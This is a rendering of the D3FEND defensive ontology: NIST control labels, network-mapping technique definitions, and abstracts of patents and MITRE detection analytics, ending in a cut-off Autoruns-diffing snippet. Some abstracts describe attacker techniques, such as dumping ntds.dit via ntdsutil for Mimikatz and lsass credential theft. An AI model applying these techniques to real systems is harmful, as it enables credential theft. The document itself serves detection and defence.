member-of

narrower

Usage (5)

rdfs:label

  • "AC-3(13)"

control-name

  • "Access Enforcement | Attribute-based Access Control"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-3(3)"

control-name

  • "Access Enforcement | Mandatory Access Control"

exactly

member-of

Usage (5)

rdfs:label

  • "AC-3(7)"

control-name

  • "Access Enforcement | Role-based Access Control"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-3(8)"

control-name

  • "Access Enforcement | Revocation of Access Authorizations"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4"

control-name

  • "Information Flow Enforcement"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(1)"

control-name

  • "Information Flow Enforcement | Object Security and Privacy Attributes"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(10)"

broader

control-name

  • "Information Flow Enforcement | Enable and Disable Security or Privacy Policy Filters"

member-of

Usage (5)

rdfs:label

  • "AC-4(11)"

broader

control-name

  • "Information Flow Enforcement | Configuration of Security or Privacy Policy Filters"

member-of

Usage (5)

rdfs:label

  • "AC-4(12)"

control-name

  • "Information Flow Enforcement | Data Type Identifiers"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(13)"

control-name

  • "Information Flow Enforcement | Decomposition into Policy-relevant Subcomponents"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(14)"

control-name

  • "Information Flow Enforcement | Security or Privacy Policy Filter Constraints"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(15)"

control-name

  • "Information Flow Enforcement | Detection of Unsanctioned Information"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(17)"

control-name

  • "Information Flow Enforcement | Domain Authentication"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(19)"

control-name

  • "Information Flow Enforcement | Validation of Metadata"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(20)"

control-name

  • "Information Flow Enforcement | Approved Solutions"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(21)"

control-name

  • "Information Flow Enforcement | Physical or Logical Separation of Information Flows"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(26)"

control-name

  • "Information Flow Enforcement | Audit Filtering Actions"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(27)"

control-name

  • "Information Flow Enforcement | Redundant/independent Filtering Mechanisms"

exactly

member-of

Usage (5)

rdfs:label

  • "AC-4(28)"

control-name

  • "Information Flow Enforcement | Linear Filter Pipelines"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(29)"

control-name

  • "Information Flow Enforcement | Filter Orchestration Engines"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(3)"

control-name

  • "Information Flow Enforcement | Dynamic Information Flow Control"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(30)"

control-name

  • "Information Flow Enforcement | Filter Mechanisms Using Multiple Processes"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(32)"

control-name

  • "Information Flow Enforcement | Process Requirements for Information Transfer"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(4)"

control-name

  • "Information Flow Enforcement | Flow Control of Encrypted Information"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(5)"

control-name

  • "Information Flow Enforcement | Embedded Data Types"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(6)"

control-name

  • "Information Flow Enforcement | Metadata"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(8)"

control-name

  • "Information Flow Enforcement | Security and Privacy Policy Filters"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-5"

broader

control-name

  • "Separation of Duties"

member-of

Usage (5)

rdfs:label

  • "AC-6"

broader

control-name

  • "Least Privilege"

member-of

Usage (5)

rdfs:label

  • "AC-6(1)"

control-name

  • "Least Privilege | Authorize Access to Security Functions"

exactly

member-of

Usage (5)

rdfs:label

  • "AC-6(10)"

control-name

  • "Least Privilege | Prohibit Non-privileged Users from Executing Privileged Functions"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-6(3)"

control-name

  • "Least Privilege | Network Access to Privileged Commands"

exactly

member-of

Usage (5)

rdfs:label

  • "AC-6(4)"

control-name

  • "Least Privilege | Separate Processing Domains"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-6(5)"

control-name

  • "Least Privilege | Privileged Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-6(6)"

control-name

  • "Least Privilege | Privileged Access by Non-organizational Users"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-6(9)"

broader

control-name

  • "Least Privilege | Log Use of Privileged Functions"

member-of

Usage (5)

rdfs:label

  • "AC-7"

control-name

  • "Unsuccessful Logon Attempts"

exactly

member-of

Usage (5)

rdfs:label

  • "AC-7(3)"

control-name

  • "Unsuccessful Logon Attempts | Biometric Attempt Limiting"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-7(4)"

broader

control-name

  • "Unsuccessful Logon Attempts | Use of Alternate Authentication Factor"

member-of

Usage (5)

rdfs:label

  • "AU-10(5)"

broader

control-name

  • "Non-repudiation | Digital Signatures"

member-of

Usage (5)

rdfs:label

  • "AU-14(2)"

control-name

  • "Session Audit | Capture and Record Content"

member-of

narrower

Usage (5)

rdfs:label

  • "AU-15"

control-name

  • "Alternate Audit Logging Capability"

member-of

narrower

Usage (5)

rdfs:label

  • "AU-2"

control-name

  • "Event Logging"

exactly

member-of

Usage (5)

rdfs:label

  • "AU-2(1)"

control-name

  • "Event Logging | Compilation of Audit Records from Multiple Sources"

exactly

member-of

Usage (5)

rdfs:label

  • "AU-2(2)"

control-name

  • "Event Logging | Selection of Audit Events by Component"

exactly

member-of

Usage (5)

rdfs:label

  • "AU-3"

control-name

  • "Content of Audit Records"

exactly

member-of

Usage (5)

rdfs:label

  • "AU-4"

control-name

  • "Audit Log Storage Capacity"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-14"

control-name

  • "Signed Components"

member-of

Usage (5)

rdfs:label

  • "CM-5"

control-name

  • "Access Restrictions for Change"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-5(1)"

control-name

  • "Access Restrictions for Change | Automated Access Enforcement and Audit Records"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-5(3)"

control-name

  • "Access Restrictions for Change | Signed Components"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-5(5)"

control-name

  • "Access Restrictions for Change | Privilege Limitation for Production and Operation"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-5(6)"

control-name

  • "Access Restrictions for Change | Limit Library Privileges"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-6(3)"

broader

control-name

  • "Configuration Settings | Unauthorized Change Detection"

member-of

Usage (5)

rdfs:label

  • "IA-2(1)"

control-name

  • "Identification and Authentication (organizational Users) | Multi-factor Authentication to Privileged Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "IA-2(2)"

control-name

  • "Identification and Authentication (organizational Users) | Multi-factor Authentication to Non-privileged Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "IA-2(4)"

control-name

  • "Identification and Authentication (organizational Users) | Local Access to Non-privileged Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "IA-2(6)"

control-name

  • "Identification and Authentication (organizational Users) | Access to Accounts — Separate Device"

member-of

narrower

Usage (5)

rdfs:label

  • "IR-4(12)"

control-name

  • "Incident Handling | Malicious Code and Forensic Analysis"

member-of

Usage (5)

rdfs:label

  • "IR-4(13)"

control-name

  • "Incident Handling | Behavior Analysis"

member-of

Usage (5)

rdfs:label

  • "MA-3(3)"

control-name

  • "Maintenance Tools | Prevent Unauthorized Removal"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-3(4)"

control-name

  • "Maintenance Tools | Restricted Tool Use"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-3(5)"

control-name

  • "Maintenance Tools | Execution with Privilege"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-3(6)"

control-name

  • "Maintenance Tools | Software Updates and Patches"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-4(1)"

control-name

  • "Nonlocal Maintenance | Logging and Review"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-6"

control-name

  • "Timely Maintenance"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-6(1)"

control-name

  • "Timely Maintenance | Preventive Maintenance"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-6(2)"

control-name

  • "Timely Maintenance | Predictive Maintenance"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-6(3)"

control-name

  • "Timely Maintenance | Automated Support for Predictive Maintenance"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-3(3)"

broader

control-name

  • "Risk Assessment | Dynamic Threat Awareness"

member-of

Usage (5)

rdfs:label

  • "RA-3(4)"

control-name

  • "Risk Assessment | Predictive Cyber Analytics"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-5"

broader

control-name

  • "Vulnerability Monitoring and Scanning"

member-of

Usage (5)

rdfs:label

  • "RA-5(2)"

control-name

  • "Vulnerability Monitoring and Scanning | Update Vulnerabilities to Be Scanned"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-5(3)"

control-name

  • "Vulnerability Monitoring and Scanning | Breadth and Depth of Coverage"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-5(4)"

control-name

  • "Vulnerability Monitoring and Scanning | Discoverable Information"

member-of

Usage (5)

rdfs:label

  • "RA-5(5)"

control-name

  • "Vulnerability Monitoring and Scanning | Privileged Access"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-5(6)"

control-name

  • "Vulnerability Monitoring and Scanning | Automated Trend Analyses"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-5(7)"

control-name

  • "Vulnerability Monitoring and Scanning | Automated Detection and Notification of Unauthorized Components"

member-of

narrower

Usage (5)

rdfs:label

  • "SA-10(1)"

control-name

  • "Developer Configuration Management | Software and Firmware Integrity Verification"

member-of

Usage (5)

rdfs:label

  • "SA-10(3)"

control-name

  • "Developer Configuration Management | Hardware Integrity Verification"

member-of

Usage (5)

rdfs:label

  • "SA-10(4)"

control-name

  • "Developer Configuration Management | Trusted Generation"

member-of

Usage (5)

rdfs:label

  • "SA-10(5)"

control-name

  • "Developer Configuration Management | Mapping Integrity for Version Control"

member-of

Usage (5)

rdfs:label

  • "SA-10(6)"

control-name

  • "Developer Configuration Management | Trusted Distribution"

member-of

Usage (5)

rdfs:label

  • "SA-11(1)"

control-name

  • "Developer Testing and Evaluation | Static Code Analysis"

member-of

Usage (5)

rdfs:label

  • "SA-11(8)"

control-name

  • "Developer Testing and Evaluation | Dynamic Code Analysis"

member-of

Usage (5)

rdfs:label

  • "SA-8(18)"

control-name

  • "Security and Privacy Engineering Principles | Trusted Communications Channels"

member-of

Usage (5)

rdfs:label

  • "SA-8(22)"

control-name

  • "Security and Privacy Engineering Principles | Accountability and Traceability"

member-of

Usage (5)

rdfs:label

  • "SC-2"

broader

control-name

  • "Separation of System and User Functionality"

member-of

Usage (5)

rdfs:label

  • "SC-2(1)"

control-name

  • "Separation of System and User Functionality | Interfaces for Non-privileged Users"

member-of

narrower

Usage (5)

rdfs:label

  • "SC-3"

broader

control-name

  • "Security Function Isolation"

member-of

Usage (5)

rdfs:label

  • "SC-3(1)"

control-name

  • "Security Function Isolation | Hardware Separation"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-2(4)"

control-name

  • "Flaw Remediation | Automated Patch Management Tools"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-2(5)"

control-name

  • "Flaw Remediation | Automatic Software and Firmware Updates"

exactly

member-of

Usage (5)

rdfs:label

  • "SI-2(6)"

control-name

  • "Flaw Remediation | Removal of Previous Versions of Software and Firmware"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-3"

broader

control-name

  • "Malicious Code Protection"

member-of

Usage (5)

rdfs:label

  • "SI-3(10)"

control-name

  • "Malicious Code Protection | Malicious Code Analysis"

exactly

member-of

Usage (5)

rdfs:label

  • "SI-3(4)"

control-name

  • "Malicious Code Protection | Updates Only by Privileged Users"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-3(8)"

control-name

  • "Malicious Code Protection | Detect Unauthorized Commands"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-4"

broader

control-name

  • "System Monitoring"

member-of

Usage (5)

rdfs:label

  • "SI-4(2)"

control-name

  • "System Monitoring | Automated Tools and Mechanisms for Real-time Analysis"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-4(4)"

control-name

  • "System Monitoring | Inbound and Outbound Communications Traffic"

member-of

narrower

Usage (5)

'has icon'

  • "network.svg"

altLabel

  • "Computer Network"

comment

  • "A network is a group of computers that use a set of common communication protocols over digital interconnections for the purpose of sharing resources located on or provided by the network nodes. The interconnections between nodes are formed from a broad spectrum of telecommunication network technologies, based on physically wired, optical, and wireless radio-frequency methods that may be arranged in a variety of network topologies."

rdfs:label

  • "Network"

rdfs:seeAlso

  • http://wordnet-rdf.princeton.edu/id/03826490-n

Usage (5)

definition

  • "Network mapping encompasses the techniques to identify and model the physical layer, network layer, and data exchange layers of the organization's network and their physical location, and determine allowed pathways through that network."

rdfs:label

  • "Network Mapping"

d3fend-id

  • "D3-NM"

display-order

  • 3

enables

Usage (5)

definition

  • "Network node inventorying identifies and records all the network nodes (hosts, routers, switches, firewalls, etc.) in the organization's architecture."

kb-article

  • "## How it works
    Administrators collect information on network nodes in their architecture using a variety of administrative and management tools that query network devices and nodes for information. In some cases, where such queries are not supported or do not provide the specific information of interest, an administrator may also collect this information through network enumeration methods, including host discovery and scanning for active ports and services.

    ## Considerations
    * Scanning and probing techniques using mapping tools can result in side effects to information technology (IT) and operational technology (OT) systems.
    * An adversary conducting network enumeration may engage in activities that parallel normal hardware inventorying activities, but would require escalating to admin privileges for most of the operations requiring administrative tools.

    ## Examples
    * Link-layer discovery
      * Link-layer Discovery Protocol (LLDP)
      * Cisco Discovery Protocol (CDP)
    * Application-layer discovery
      * Simple Network Management Protocol (SNMP) collects MIB information
      * Web-based Enterprise Management (WBEM) collects CIM information
      * Windows Management Instrumentation (WMI)
      * Windows Management Infrastructure (MI)"

rdfs:label

  • "Network Node Inventory"

synonym

  • "System Discovery"
  • "System Inventorying"

d3fend-id

  • "D3-NNI"

inventories

kb-reference

Usage (5)

definition

  • "Network traffic policy mapping identifies and models the allowed pathways of data at the network, transport, and/or application levels."

rdfs:label

  • "Network Traffic Policy Mapping"

synonym

  • "DLP Policy Mapping"
  • "Firewall Mapping"
  • "IPS Policy Mapping"
  • "Web Security Gateway Policy Mapping"

d3fend-id

  • "D3-NTPM"

kb-reference

maps

queries

Usage (5)

definition

  • "Network vulnerability assessment relates all the vulnerabilities of a network's components in the context of their configuration and interdependencies and can also include assessing risk emerging from the network's design as a whole, not just the sum of individual network node or network segment vulnerabilities."

rdfs:label

  • "Network Vulnerability Assessment"

d3fend-id

  • "D3-NVA"

evaluates

identifies

Usage (5)

comment

  • "Identifying staff and organizational structure is part of operational activity mapping. One inventories assets; people are *not* assets, but are resources. Grasping operations and activities (missions) and mapping them to people is (notionally) the last phase of modeling architecture."

definition

  • "Operational activity mapping identifies activities of the organization and the organization's suborganizations, groups, roles, and individuals that carry out the activities and then establishes the dependencies of the activities on the systems and people that perform those activities."

rdfs:label

  • "Operational Activity Mapping"

synonym

  • "Mission Mapping"

d3fend-id

  • "D3-OAM"

enables

kb-reference

Usage (5)

definition

  • "Operational dependency mapping identifies and models the dependencies of the organization's activities on each other and on the organization's performers (people, systems, and services.) This may include modeling the higher- and lower-level activities of an organization forming a hierarchy, or layering, of the dependencies in an organization's activities."

rdfs:label

  • "Operational Dependency Mapping"

d3fend-id

  • "D3-ODM"

kb-reference

maps

Usage (5)

definition

  • "Operational risk assessment identifies and models the vulnerabilities of, and risks to, an organization's activities individually and as a whole."

rdfs:label

  • "Operational Risk Assessment"

synonym

  • "Mission Risk Assessment"

d3fend-id

  • "D3-ORA"

evaluates

identifies

kb-reference

Usage (5)

rdfs:label

  • "Organization"

Usage (5)

definition

  • "Organization mapping identifies and models the people, roles, and groups within an organization and the relations between them."

rdfs:label

  • "Organization Mapping"

d3fend-id

  • "D3-OM"

display-order

  • 4

kb-reference

maps

may-map

Usage (5)

rdfs:label

  • "Organizational Activity"

Usage (5)

definition

  • "Passive logical link mapping only listens to network traffic as a means to map the whole data link layer, where the links represent logical data flows rather than physical connections."

rdfs:label

  • "Passive Logical Link Mapping"

synonym

  • "Passive Logical Layer Mapping"

d3fend-id

  • "D3-PLLM"

kb-reference

Usage (5)

definition

  • "Passive physical link mapping only listens to network traffic as a means to map the physical layer."

rdfs:label

  • "Passive Physical Link Mapping"

synonym

  • "Passive Physical Layer Mapping"

d3fend-id

  • "D3-PPLM"

Usage (5)

rdfs:label

  • "Person"

Usage (5)

definition

  • "A physical link is a dedicated connection for communication that uses some physical media (electrical, electromagnetic, optical, to include clear spaces or vacuums.) A physical link represents only a single hop (link) in any larger communications path, circuit, or network.

    NOTE: not synonymous with data link, as a data link can be over a telecommunications circuit, which may be a virtual circuit composed of multiple physical links."

rdfs:label

  • "Physical Link"

rdfs:seeAlso

synonym

  • "Layer-1 Link"

Usage (5)

definition

  • "Physical link mapping identifies and models the link connectivity of the network devices within a physical network."

rdfs:label

  • "Physical Link Mapping"

synonym

  • "Layer 1 Mapping"

d3fend-id

  • "D3-PLM"

kb-reference

maps

Usage (5)

kb-abstract

  • "Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-07-001: Access Permission Modification - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-07-001: Access Permission Modification"

Usage (5)

kb-abstract

  • "Systems, methods, and related technologies for account access monitoring are described. In certain aspects, a login request associated with a device can be analyzed and a score determined. The score and a threshold can be used to determine whether to initiate an action."

kb-author

  • "Chunhui Zhan, Siying Yang"

kb-mitre-analysis

  • ""

kb-organization

  • "Forescout Technologies"

rdfs:label

  • "Reference - Account monitoring - Forescout Technologies"

kb-reference-of

kb-reference-title

  • "Account monitoring"

Usage (5)

kb-abstract

  • "The NTDSUtil tool may be used to dump a Microsoft Active Directory database to disk for processing with a credential access tool such as Mimikatz. This is performed by launching ntdsutil.exe as a privileged user with command line arguments indicating that media should be created for offline Active Directory installation and specifying a folder path. This process will create a copy of the Active Directory database, ntds.dit, to the specified folder path."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-08-002: Active Directory Dumping via NTDSUtil - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-08-002: Active Directory Dumping via NTDSUtil"

Usage (5)

kb-abstract

  • "System and methodology providing automated or "proactive" network security ("active" firewall) are described. The system implements methodology for verifying or authenticating communications, especially between network security components thereby allowing those components to share information. In one embodiment, a system implementing an active firewall is provided which includes methodology for verifying or authenticating communications between network components (e.g., sensor(s), arbiter, and actor(s)), using cryptographic keys or digital certificates. Certificates may be used to digitally sign a message or file and, in a complementary manner, to verify a digital signature. At the outset, particular software components that may participate in authenticated communication are specified, including creating a digital certificate for each such software component. Upon detection by a sensor that an event of interest has occurred in the computer network system, the system may initiate authenticated communication between the sensor component and a central arbiter (e.g., "event orchestrator") component, so that the sensor may report the event to the arbiter or "brain." Thereafter, the arbiter (if it chooses to act on that information) initiates authenticated communication between itself and a third software component, an "actor" component (e.g., "firewall"). The arbiter may indicate to the actor how it should handle the event. The actor or firewall, upon receiving the information, may now undertake appropriate action, such as dynamically creating or modifying rules for appropriately handling the event, or it may choose to simply ignore the information."

kb-author

  • "Emilio Villa, Adrian Zidaritz, Michael David Varga, Gerhard Eschelbeck, Michael Kevin Jones, Mark James McArdle"

kb-mitre-analysis

  • ""

kb-organization

  • "McAfee LLC"

rdfs:label

  • "Reference - Active firewall system and methodology - McAfee LLC"

kb-reference-of

kb-reference-title

  • "Active firewall system and methodology"

Usage (5)

kb-abstract

  • "Disclosed is a device management system for discovery and management of components added to computer systems and sub-systems. The device management system provides for recognizing a newly added component, and determining if the newly added component is already a part of the system inventory. The newly added component is matched with a component currently on the system, based on at least one matching attribute. A point total is calculated for each match level and a final match score is provided. The match score is compared with an aggressiveness level to determine if a match does indeed exist."

kb-author

  • "Rajneesh Jalan, Joseph M. Schmitt, and Marco Simoes"

kb-organization

  • "Device42 Inc"

rdfs:label

  • "Reference - Advanced device matching system"

kb-reference-of

kb-reference-title

  • "Advanced device matching system"

Usage (5)

kb-abstract

  • "Once a credential dumper like mimikatz runs, every user logged on since boot is potentially compromised, because the credentials were accessed via the memory of lsass.exe. When such an event occurs, this analytic will give the forensic context to identify compromised users. Those users could potentially be used in later events for additional logons.

    The time field indicates the first and last time a system reported a user logged into a given system. This means that activity could be intermittent between the times given and should not be considered a duration."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2015-07-001: All Logins Since Last Boot - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2015-07-001: All Logins Since Last Boot"

Usage (5)

kb-abstract

  • "This paper provides an in-depth technical assessment of the security improvements implemented in Windows Vista, focusing primarily on the areas of User Account Protection and User Interface Privilege Isolation. This paper discusses these features and touches on several of their shortcomings. It then demonstrates how it is possible to combine these attacks to gain full control over the machine from a low integrity, low privilege process."

kb-author

  • "Matthew Conover"

kb-mitre-analysis

  • ""

kb-organization

  • "Symantec Corporation"

rdfs:label

  • "Reference - Analysis of the Windows Vista Security Model - Symantec Corporation"

kb-reference-of

kb-reference-title

  • "Analysis of the Windows Vista Security Model"

Usage (5)

kb-abstract

  • "The invention provides a system and method for automatic creation of adaptive behavioral profiles for observables associated with resource states and events in a computer network (IT) infrastructure of an enterprise and for detecting anomalies that represent potential malicious activity and threats as deviations from normal behavior. Separate profiles may be created for each behavioral indicator, as well as for each time series of measurements, and aggregated to create an overall behavioral profile. An anomaly probability is determined from the behavioral profile and used to evaluate the data values of observables. Outlier data values which deviate from normal behavior by more than a predetermined probability threshold are identified for risk analysis as possible threats while inliers within the range of normal behavior are used to update the behavioral profile. Behavioral profiles are created for behavioral indicators based upon observables measured over predetermined time periods using algorithms employing statistical analysis approaches that work for any type of data distribution, and profiles are adapted over time using data aging to more closely represent current behavior. Algorithm parameters for creating profiles are based on the type of data, i.e., its metadata."

kb-author

  • "Igor A. Baikalov; Tanuj Gulati; Sachin Nayyar; Anjaneya Shenoy; Ganpatrao H. Patwardhan"

kb-mitre-analysis

  • "The patent describes a technique for detecting anomalous activity within an organization's IT infrastructure to identify threats. Behavioral profiles can be grouped by peer groups that identify functionally similar groups of actors (users or resources) based on their attributes and pre-defined grouping rules. For example, users can be grouped by their job title, organizational hierarchy, or location and can be observed for similarities in access patterns, based on granted access entitlements or actual logged resource access.

    Behavioral profiles are created from measurements of events over a time period for example:

    * Transaction counts
    * Concurrent users per hour
    * Daily volume of data

    Outlier data values which deviate from behavioral profile by more than a predetermined probability threshold are identified for risk analysis as possible threats."

kb-organization

  • "Securonix Inc"

rdfs:label

  • "Reference - Anomaly Detection Using Adaptive Behavioral Profiles - Securonix Inc"

kb-reference-of

kb-reference-title

  • "Anomaly Detection Using Adaptive Behavioral Profiles"

Usage (5)

kb-abstract

  • "An anti-tamper system is disclosed that includes self-adjusting guards inserted in software. Self-adjusting guards include invocation criteria and guard function. During run-time, each time the self-adjusting guard is invoked, the invocation criteria is evaluated and the guard function is only executed if the invocation criteria is satisfied. The invocation criteria can be static or dynamic, satisfied randomly with fixed or varying probability, a monotonically or exponentially decreasing function or most any other type of function. The invocation criteria can be satisfied based on elapsed inter-guard invocation time (time since last guard function execution), target inter-guard invocation time, and/or guard execution time. A method is disclosed of inserting self-adjusting guards into software, and executing the software. Evaluating the invocation criteria can include adjusting the invocation criteria when satisfied. The self-adjusting guards can be inserted into the software at a source or object code level."

kb-author

  • "Kevin Dale Morgan"

kb-mitre-analysis

  • ""

kb-organization

  • "ARXAN TECHNOLOGIES Inc"

rdfs:label

  • "Reference - Anti-tamper system with self-adjusting guards - ARXAN TECHNOLOGIES Inc"

kb-reference-of

kb-reference-title

  • "Anti-tamper system with self-adjusting guards"

Usage (5)

kb-abstract

  • "An apparatus is disclosed for to provide content to and query a reverse domain name system (DNS) server without depending on the kindness of domain name system registrars, registrants. DNS replies are observed by firewalls or filters, analyzed, and transmitted to a reverse domain name system server. An embodiment of the present invention can be within a DNS server or SMTP server."

kb-author

  • "Dean Danko"

kb-mitre-analysis

  • "This patent includes the description of a method of blocking email traffic from untrusted domains by analyzing the TCP/IP source IP addresses and blocking traffic for IPs whose reverse lookup response FQDN matches a denylist."

rdfs:label

  • "Reference - Apparatus for to provide content to and query a reverse domain name system server - Barracuda Networks"

kb-reference-of

kb-reference-title

  • "Apparatus for to provide content to and query a reverse domain name system server"

Usage (5)

kb-abstract

  • "A system comprises one or more application containers, each application container including computer-readable instructions and initiated via a container service and isolated using operating system-level virtualization. The system also comprises one or more virtual switches configured to route traffic from the application containers. The system further comprises one or more security containers, each security container configured to transparently intercept traffic from the one or more application containers for analysis of network security. The system further comprises a user interface (UI) container configured to receive configuration settings from a user. The system also comprises an analytics container configured to perform analysis on data received from the one or more security containers. The system also comprises a management container configured to configure settings for the one or more security containers and the analytics container."

kb-author

  • "Gang Duan"

kb-mitre-analysis

  • ""

kb-organization

  • "Neuvector Inc"

rdfs:label

  • "Reference - Architecture of transparent network security for application containers - Neuvector Inc"

kb-reference-of

kb-reference-title

  • "Architecture of transparent network security for application containers"

Usage (5)

kb-abstract

  • "A system and process for addressing computer security vulnerabilities. The system and process generally comprise aggregating vulnerability information on a plurality of computer vulnerabilities; constructing a remediation database of said plurality of computer vulnerabilities; constructing a remediation signature to address the computer vulnerabilities; and deploying said remediation signature to a client computer. The remediation signature essentially comprises a sequence of actions to address a corresponding vulnerability. A managed automated approach to the process is contemplated in which the system is capable of selective deployment of remediation signatures; selective resolution of vulnerabilities; scheduled deployment of remediation signatures; and scheduled scanning of client computers for vulnerabilities."

kb-author

  • "Carl E. Banzhof"

kb-organization

  • "McAfee LLC"

rdfs:label

  • "Reference - Automated computer vulnerability resolution system"

kb-reference-of

kb-reference-title

  • "Automated computer vulnerability resolution system"

Usage (5)

kb-abstract

  • "A cyber security system comprising circuitry of a decoy deployer planting one or more decoy lateral attack vectors in each of a first and a second group of resources within a common enterprise network of resources, the first and second groups of resources having different characteristics in terms of subnets, naming conventions, DNS aliases, listening ports, users and their privileges, and installed applications, wherein a lateral attack vector is an object of a first resource within the network that has a potential to be used by an attacker who discovered the first resource to further discover information regarding a second resource within the network, the second resource being previously undiscovered by the attacker, and wherein the decoy lateral attack vectors in the first group conform to the characteristics of the first group, and the decoy lateral attack vectors in the second group conform to the characteristics of the second group."

kb-author

  • "Shlomo Touboul; Hanan Levin; Stephane Roubach; Assaf Mischari; Itai Ben David; Itay Avraham; Adi Ozer; Chen Kazaz; Ofer Israeli; Olga Vingurt; Liad Gareh; Israel Grimberg; Cobby Cohen; Sharon Sultan; Matan Kubovsky"

kb-mitre-analysis

  • ""

kb-organization

  • "Illusive Networks Ltd"

rdfs:label

  • "Reference - Automatically generating network resource groups and assigning customized decoy policies thereto - Illusive Networks Ltd"

kb-reference-of

kb-reference-title

  • "Automatically generating network resource groups and assigning customized decoy policies thereto"

Usage (5)

kb-abstract

  • "A method and system for creating security policies for firewall and connection policies in an integrated manner is provided. The security system provides a user interface through which a user can define a security rule that specifies both a firewall policy and a connection policy. After the security rule is specified, the security system automatically generates a firewall rule and a connection rule to implement the security rule. The security system provides the firewall rule to a firewall engine that is responsible for enforcing the firewall rules and provides the connection rule to an IPsec engine that is responsible for enforcing the connection rules."

kb-author

  • "Charles D. Bassett; Eran Yariv; Ian M. Carbaugh; Lokesh Srinivas Koppolu; Maksim Noy; Sarah A. Wahlert; Pradeep Bahl"

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - Automatically generating rules for connection security - Microsoft"

kb-reference-of

kb-reference-title

  • "Automatically generating rules for connection security"

Usage (5)

kb-abstract

  • "The Sysinternals tool Autoruns checks the registry and file system for known persistence mechanisms. It will output any tools identified, including built-in or added-on Microsoft functionality and third party software. Many of these locations are known by adversaries and used to obtain Persistence. Running Autoruns periodically in an environment makes it possible to collect and monitor its output for differences, which may include the removal or addition of persistent tools. Depending on the persistence mechanism and location, legitimate software may be more likely to make changes than an adversary tool. Thus, this analytic may result in significant noise in a highly dynamic environment. While Autoruns is a convenient method to scan for programs using persistence mechanisms, its scanning nature does not conform well to streaming based analytics. This analytic could be replaced with one that draws from sensors that collect registry and file information if streaming analytics are desired.

    Utilizes the Sysinternals autoruns tool (ignoring validated Microsoft entries). Primarily not a detection analytic by itself, but through analysis of results by an analyst it can be used for such. Building another analytic on top of this one identifying unusual entries would likely be a beneficial alternative."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-01-002: Autorun Differences - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-01-002: Autorun Differences"
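The snapshot differencing the analytic describes, written out as an added example (not MITRE's or Sysinternals' code). It assumes the column subset shown in the two constructed snapshots (real "autorunsc -c" output carries more columns), drops entries whose Signer begins with "(Verified) Microsoft" as the analytic suggests, and keys each entry by location and name so that a changed image path or launch string surfaces as a change rather than as an unrelated add/remove pair.

```python
import csv
import io

# Constructed, simplified Autoruns CSV snapshots (column subset only; not real host data).
SNAPSHOT_BASELINE = r"""Entry Location,Entry,Enabled,Signer,Image Path,Launch String
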